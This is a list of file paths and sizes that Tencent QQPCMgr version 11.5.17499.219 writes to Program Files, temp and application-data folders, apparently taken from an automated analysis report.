    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.rdb (6313 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNetRepair.png (436 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\TPSConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.tpc (727 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1602.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_130.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsDefenseBT64.sys (1701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\arkGraphic.dll (4164 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1024.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenInfo.xml (202 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AdfilterExtension.crx (213 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcr80.dll (7024 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.exe (6063 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virpe01.def (1723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.1.prf (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp5_m.inf (940 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Deopt.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1225.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.rdb (61 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.64.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\RICHED20.DLL (8670 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.exe (3236 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcweiyundiskjmp.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1025.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.rdb (46 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qmcloudinter\QMHipsProcessDecouple.dat (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\communic.dll (1075 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftTrayTips.ini (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_668.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AntiRKX64.sys (1674 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SuperSpeedup.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\SysOptimize.dll (1604 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\tinyxml.dll (2423 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield48.png (890 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\QQPCDetector\dlcore.dll (21288 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\arkGraphic.dll (1826 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm02.dat (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPTool.exe (2103 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1220.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.rdb (3562 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\extract.dll (2105 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SoftMove.png (622 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\traceclear.tpc (687 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeSwitch.etf (935 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMonX64.sys (744 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmsc.DAT (580 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMobileFlux\QMNetMobileFluxDll.dll (796 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHwNetwork.dll (571 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\dr.dll (1718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.rdb (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.dll (9622 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SysSpeedUpDll.dll (1137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmscj.DAT (500 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpclaunch.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_141.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1032.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCExternal.exe (1788 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTraceClearDll.dll (7045 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\QMTraceClear.PNG (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\SMFilter.etf (769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCLeakScan\QQPCLeakScan.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.exe (4372 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1231.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.inf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\QMHPGarbageScan\HPGarbageScannerConf.xml (83 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\8.0.50727.4053.Policy (804 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_660.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1105.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\OptimizeExDll.dll (5209 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelXP.sys (289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2061.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1085.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysgarbagejmp\SysGarbageJmp.dll (416 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_907.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\QQPCCommonMgr.rdb (15021 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSClinicWebFix.dll (1775 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\adplugin\QMAdFilter(big).png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.rdb (151 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\CategoryConfig.xml (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\BugReportRule.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\GF.dll (25490 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_891.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\sqlite.dll (4892 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.exe (5977 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.rdb (83 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\NiZhanConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHwVedioDetect.dll (1629 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmupdatemodule\QMUpdateModule.dll (2416 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\BrowserInfo.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.rdb (267 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpclinicscanplugin\HPClinicScanPlugin.dll (2579 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSMalFilter.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.exe (6194 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.rdb (274 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\exnscan64.dll (6525 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1609.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FZLTCXHJW.TTF (9606 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1997.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1029.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.rdb (168 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibfloat.xml (294 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1610.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield64.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.tpc (701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcInfo.etf (97 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSKsp.sys (2971 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloadStrategy.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.dat (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.Policy (804 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.rdb (180 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_SPGameScore.dat (925 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.exe (11094 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebMon.dat (6555 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPluginMgr.dll (10396 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMNetworkMgr.dll (2787 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMCommon.dll (8811 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\X5Config.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1033.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\support.etf (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\dr.dll (5495 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_706.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1436.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.exe (13004 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\DownloaderMgrUI.png (309 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR_64.exe (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysGarbageJmp.png (515 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSHeart.dll (1136 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKitProxy.dll (1724 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\sqlite.dll (3073 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\UninstallScan.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libjpegturbo.dll (3590 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSBlueScreenbak.xml (80 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysgarbagejmp\SysCleanPage.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.rdb (119 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.dll (1126 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.dat (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00000.tvl (11 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1110.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_559.png (2 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\adconfig.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator64.sys (142 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfg.etf (284 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.dat (480 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVCache.dll (5471 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\zspic.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinicHelper.exe (1018 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcm80.dll (4106 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SpeedupPlugins.etf (796 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.rdb (135 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.dll (1592 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_87.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1088.dat (449 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSPolicyEng.dll (7108 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1410.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\IEStartPage.png (433 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1103.dat (446 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1383.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetflowMgr.dll (2463 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMonFrc.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virstr00.def (692 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\libexpatw.dll (1565 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebDownLoadProtect.dll (777 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKit.sys (1385 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.tpc (710 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebMon64.dat (1704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\dlcore.dll (15278 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\denoiser_info.ini (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GF.dll (34298 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sTurnOnAdapter.png (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.rdb (18 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_528.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetflowOpti.png (928 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1102.dat (455 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftBaseInfoForFileOpen.etf (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCCommonMgr.rdb (15789 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepProv.dat (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpCheck.dll (4823 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libpng.dll (1215 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_GameScore.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1227.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_949.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRepairPlugin.dll (1793 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMKCheck\QMKCheck.dll (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libpng.dll (643 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.rdb (158 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUAgent.dll (4091 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1099.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (405 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt64.dll (6370 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInstaller.exe (2528 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (158 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPVulScan\HPVulScan.dll (1029 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\unstag.etf (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMon.dll (6571 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVUpload.dll (4333 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUL.dll (3677 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan.dll (1674 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1200.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.rdb (317 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (273 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone_Notify.ico (292 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQPCLaunch.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnectDll.dll (1270 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysOptimize.png (597 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1023.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1002.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (97 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.dat (688 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator.sys (2520 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_691.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.exe (2818 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefragWhiteList.etf (211 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCoreCfgV1.dat (3714 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel64.sys (1025 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMon.sys (2373 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHardware.dll (3699 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_571.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_112.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_794.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOPlatform.dll (13792 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.exe (2794 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.rdb (1729 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOLUIControl.dll (5819 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.DAT (717 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\PrefetchConfig.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp_64.sys (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1604.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInfo.xml (37 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.dat (848 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr.ico (289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssLibHlp.dll (1613 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.sys (27 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Common.dll (28727 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSecScanLib.dll (216 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1034.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1302.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\xGraphic32.dll (2012 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DNFConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libjpegturbo.dll (3859 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Win10ToastNotification.dll (3603 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
